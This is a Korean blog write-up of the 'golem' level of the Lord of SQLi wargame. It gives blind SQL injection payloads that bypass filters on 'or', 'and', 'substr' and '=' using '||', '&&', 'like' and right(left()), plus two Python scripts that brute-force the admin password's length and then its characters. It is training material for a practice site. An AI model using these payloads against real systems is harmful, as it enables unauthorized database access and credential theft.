본문 바로가기
워게임/LOS

golem

by meanjung 2021. 10. 2.

prob _ . () 필터링

or  and  substr(  = 필터링

 

1. pw length 구하기

= 대신 like를 사용했다.

' || id like 'admin' && length(pw) like 1#

import requests
i = 1
while True:
    url = f"https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php?pw=%27%20%7C%7C%20id%20like%20%27admin%27%20%26%26%20length(pw)%20like%20{i}%23"
    cookies = {"PHPSESSID":""}
    res = requests.get(url, cookies=cookies)
    if "Hello admin" in res.text:
        print('pw length : ',i)
        break
    i+=1

 

2. pw 하나하나 구하기

' || id like 'admin' && right(left(pw, 1),1) like char(c)

import requests

cookies={'PHPSESSID':''}
password = ""
for i in range(1, 9):
    for c in range(48, 123):
        response = requests.get(f"https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php?pw=%27%20%7C%7C%20id%20like%20%27admin%27%20%26%26%20right(left(pw%2C{i})%2C1)%20like%20char({c})%23",cookies=cookies)
        if 'Hello admin' in response.text:
            password += chr(c)
            print(password)
            break

 

'워게임 > LOS' 카테고리의 다른 글

bugbear  (0) 2021.10.02
darkknight  (0) 2021.10.02
skeleton  (0) 2021.10.02
vampire  (0) 2021.10.02
troll  (0) 2021.10.02

관련글

댓글

티스토리툴바